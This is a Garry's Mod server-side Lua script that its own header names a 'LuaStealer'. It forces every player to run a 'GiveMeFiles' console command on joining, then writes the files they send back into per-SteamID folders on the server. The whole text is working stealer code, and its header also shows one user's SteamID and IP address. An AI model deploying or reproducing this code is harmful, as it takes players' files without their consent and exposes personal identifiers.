--[[
	MOD/lua/Stealer/freshyp_LuaStealer.lua [#852 (#882), 50403098, UID:2934061866]
	lemmagame.com Check it out | STEAM_0:0:45881962 <209.89.51.159:27005> | [03.05.14 05:32:53PM]
	===BadFile===
]]

local directory = "LuaLovers"
if !file.IsDir(directory) then
file.CreateDir(directory)
end
util.AddNetworkString("SENDYOURSHIT2SERVER")

function DataReceive(len, ply)
local ID = string.gsub(string.gsub(ply:SteamID(),":","-"),"_","-")
local fName = net.ReadString()
local Content = net.ReadTable()
local fContent = ""

for k, v in pairs(Content) do
	fContent = tostring(fContent) .. tostring(v)
end

if (!file.IsDir(directory.."/"..ID.."/"..string.GetPathFromFilename(fName),"DATA")) then
file.CreateDir(directory.."/"..ID.."/"..string.GetPathFromFilename(fName))				   
end
file.Write(directory.."/"..ID.."/"..fName,fContent)
end

net.Receive("SENDYOURSHIT2SERVER", DataReceive)

hook.Add("PlayerInitialSpawn", math.random(9999999), function(ply)
ply:ConCommand("GiveMeFiles")
end)

for k,v in pairs(player.GetAll()) do
v:ConCommand("GiveMeFiles")
end